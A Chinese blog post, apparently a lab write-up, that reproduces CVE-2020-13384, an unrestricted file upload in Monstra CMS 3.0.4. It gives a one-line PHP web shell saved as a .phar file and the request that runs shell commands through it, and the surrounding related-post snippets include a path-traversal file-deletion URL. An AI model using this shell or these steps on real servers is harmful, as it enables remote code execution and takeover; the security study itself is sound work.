CVE-2020-13384:monstra 文件上传

已于 2022-10-01 00:38:49 修改
阅读量1.7k 收藏 2
点赞数 1
文章标签: 网络安全 安全 网络
于 2022-10-01 00:38:35 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Foreverlove112/article/details/127130842
版权

漏洞描述

Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。
该程序不允许’html’, ‘htm’, ‘js’, ‘jsb’, ‘mhtml’, ‘mht’, ‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘phps’,‘shtml’, ‘jhtml’, ‘pl’, ‘py’, ‘cgi’, ‘sh’, ‘ksh’, ‘bsh’, ‘c’, ‘htaccess’, ‘htpasswd’,‘exe’, ‘scr’, ‘dll’, ‘msi’, ‘vbs’, ‘bat’, ‘com’, ‘pif’, ‘cmd’, ‘vxd’, ‘cpl’,'empty’后缀的文件上传

影响范围

3.0.4

漏洞复现

访问靶机进行注册,随意填写就好
在这里插入图片描述
在这里插入图片描述

这里也随意注册
在这里插入图片描述

因为配置文件的白名单,我们只能上传指定后缀名的文件
在这里插入图片描述

我们编写phar文件

<?php if(isset($_REQUEST['cmd'])){echo "<pre>";$cmd = ($_REQUEST['cmd']);system($cmd);echo "</pre>";die;}?>

在这里插入图片描述

我们进行文件上传
在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

我们访问我们上传木马文件并执行命令

http://123.58.224.8:49663/public/uploads/test.phar?cmd=ls%20/tmp

在这里插入图片描述

漏洞修复

参考

https://www.exploit-db.com/exploits/48479
https://xz.aliyun.com/t/7850
Doxi-13A
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
monstra 文件上传CVE-2020-13384
qq_32445755的博客
06-07 638
Monstra 是一个现代化的轻量级内容管理系统。它易于安装、升级和使用。 Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。 该程序不允许’html’, ‘htm’, ‘js’, ‘jsb’, ‘mhtml’, ‘mht’, ‘php’, ‘phtml’, ‘php3’, ‘php4’, ‘php5’, ‘phps’,‘shtml’, ‘jhtml’, ‘pl’, ‘py’, ‘cgi’, ‘sh’, ‘ksh
CVE-2020-36179:CVE-2020-36179~82 Jackson-databind SSRF&RCE
05-29
描述CVE-2020-36179:2.9.10.8之前的FasterXML jackson-databind 2.x处理与oadd.org.apache.commons.dbcp.cpdsadapter.DriverAdapterCPDS相关的序列化小工具和键入之间的交互。 CVE-2020-36180:FasterXML jackson-...
漏洞复现-monstra-文件上传】vulfocus/monstra_cve_2020_13384
10-10 1320
monstra-文件上传】后缀的理解
推荐一款不再维护的项目:Monstra CMS
最新发布
gitblog_00085的博客
05-23 373
推荐一款不再维护的项目:Monstra CMS 注意:此项目已不再支持,请查看 Flextype 获取最新的CMS解决方案! 项目地址:https://gitcode.com/monstra-cms/monstra 项目简介 Monstra是一款现代化且轻量级的内容管理系统(CMS),尽管它已经停止了官方支持,但依然值得回顾其设计理念和功能。Monstra提供了一个简洁的界面和强大的管理工具,使得...
monstra 文件上传(CVE-2020-13384)
m0_65150886的博客
01-02 602
Monstra CMS 3.0.4版本中存在着一处安全漏洞,该漏洞源于程序没有正确验证文件扩展名。攻击者可以上传特殊后缀的文件执行任意PHP代码。6.编写test.phar文件。4.跳转到登录页面,随意注册。2.进行注册,随意填写就好。输入注册的用户名密码登录。1.访问ip:port。3.注册成功,点击登录。
Monstra CMS文件上传(vulfocus/monstra_cve_2020_13384的writeup)
sGanYu
05-04 2419
环境:Vulfocus 漏洞威胁分析平台 writeup 开启环境 随意注册一个用户,如果说记性不好的话(bushiwo)可以把账户名密码都设置为admin,邮箱随意 直奔主题 漏洞路径:http://123.58.236.76:48412/admin/ ,如果是和我一样注册的话,这里用户名和密码都是admin 点击上传文件 第一步,上传所需文件,第二步,抓包 注意:程序不允许'html', 'htm', 'js', 'jsb', 'mhtml', 'mht', 'p.
CVE-2020-35728:CVE-2020-35728 和 Jackson-databind RCE
05-31
描述 2.9.10.8 之前的 FasterXML jackson-databind 2.x 错误处理了与 ... web/javax.servlet.jsp.jstl)。 如何RCE pom.xml <?xml version="1.0" encoding="UTF-8"?>...
CVE-2020-1206-POC:CVE-2020-1206未初始化的内核内存读取POC
03-20
(c)2020 ZecOps,Inc.- ://www.zecops.com-查找攻击者的错误POC检查CVE-2020-1206 /“ SMBleed”预期结果:包含目标计算机内核内存的本地文件。仅用于公司环境中的教育和测试。 ZecOps对代码不承担任何责任,使用...
CVE-2020-11890:CVE-2020-11890
03-10
CVE-2020-11890:用户组表类中的输入验证不正确可能会导致RCE的ACL配置损坏 关联 PoC 受影响的版本:3.9.17之前的Joomla核心 用户要求:管理员帐户(非超级管理员) 获得访问权限:创建一个新的超级管理员,然后触发...
CVE-2020-8163:CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码
03-09
CVE-2020-8163 CVE-2020-8163-在Rails中远程执行用户提供的本地名称的代码 在Rails <5.0.1中远程执行用户提供的本地名称 5.0.1之前的Rails版本中存在一个漏洞,该漏洞将允许攻击者控制render调用的locals参数。 ...
monstra 3.0.4 任意文件删除
weixin_34375233的博客
09-11 184
monstra 3.0.4 任意文件删除 Vulnerable URL:http://127.0.0.1/monstra-3.0.4/admin/index.php?id=filesmanager&delete_file=1.txt&path=uploads/.......//./.......//./&token=7514f1bfccba396c26a9b80341db8...
2020-11-11
wo_year的博客
11-11 113
初次写博客 打工人
Vulfocus 入门+初级
大雾
05-20 3418
名称: 命令执行漏洞 描述: 命令执行(Command Execution)漏洞即黑客可以直接在Web应用中执行系统命令,从而获取敏感信息或者拿下shell权限 命令执行漏洞可能造成的原因是Web服务器对用户输入命令安全检测不足,导致恶意代码被执行 flag 存放在tmp路径下 名称: vulshare/python-flag:latest 描述: 目录浏览漏洞属于目录遍历漏洞的一种,目录浏览漏洞是由于网站存在配置缺陷,存在目录可浏览漏洞,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置.
typesetter 文件上传CVE-2020-25790)
小小猪的博客
12-30 781
typesetter 文件上传CVE-2020-25790) 漏洞简介: Typesetter CMS 内容管理系统是Php源码频道下深受用户喜爱的软件。 Typesetter CMS 存在代码问题漏洞,该漏洞源于允许管理员通过ZIP归档中的. PHP文件上传和执行任意PHP代码。 环境搭建: 在线环境 地址 漏洞复现: 访问首页 点击logged in 进入登录界面 账号密码: admin admin 创建一句话文件,压缩成压缩包 <?php @eval($...
2020-04-11
weixin_46978734的博客
04-11 77
想要实现dnf自动捡物品的思路
UCMS文件上传漏洞(CVE-2020-25483)
鸣蜩十四的博客
11-11 3716
简介 UCMS是一套使用PHP语言编写的内容管理系统。 漏洞概述 UCMS v1.4.8版本存在安全漏洞,该漏洞源于文件写的fopen()函数存在任意命令执行漏洞,攻击者可利用该漏洞可以通过该漏洞访问服务器。 影响版本 UCMS v1.4.8 测试环境 使用的是vulfocus平台自带镜像,直接开启,进入靶场环境,目录为/ucms 漏洞分析 在1.4.8版本中,下载源码进行分析 可以看到在fileedit.php中对上传的文件没有做任何过滤,导致任意文件上传漏洞 在index.php文件中可以看到参数d
CVE-2020-25648:RHSA-2021:1384: nss 安全和BUG修复更新
hvang1988的专栏
10-22 2983
CVE-2020-25648:RHSA-2021:1384: nss 安全和BUG修复更新 1、RHSA-2021漏洞详情 RHSA-2021:1384: nss 安全和BUG修复更新-吾爱编程网 2、漏洞描述 漏洞编号:CVE-2020-25648 漏洞公告:Mozilla NSS拒绝服务漏洞 漏洞描述:NSS是美国Mozilla基金会的一个底层密码学库。该库支持多种加密算法,并且 Firefox 浏览器的TLS实现基于该库。 NSS 3.58之前的版本存在安全漏洞,该漏洞源于NSS处理CCS
CVE-2020-13384
09-13
CVE-2020-13384是一个与monstra文件上传相关的漏洞。根据引用中提供的信息,该漏洞的描述、影响范围、漏洞复现和漏洞修复方法如下: 0x01 漏洞描述: CVE-2020-13384monstra文件上传功能中存在的漏洞。该漏洞可能导致攻击者能够上传恶意文件到服务器上,并在服务器上执行任意代码。 0x02 影响范围: 该漏洞影响的是monstra版本。目前没有提供具体受影响版本的信息。 0x03 漏洞复现: 根据引用中提供的参考链接,可以找到漏洞的详细复现方法。在此处我无法提供具体的复现步骤,请参考给出的参考链接。 0x04 漏洞修复: 关于CVE-2020-13384漏洞修复方法,由于我无法直接访问到引用中的参考链接内容,请参考引用中提供的参考链接获取详细的修复方法。根据经验,常见的漏洞修复方法可能包括升级软件版本、应用补丁或者禁用受影响的功能等。 请注意,以上提供的信息仅供参考,请确保遵循官方渠道发布的漏洞公告和建议来确保系统的安全性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值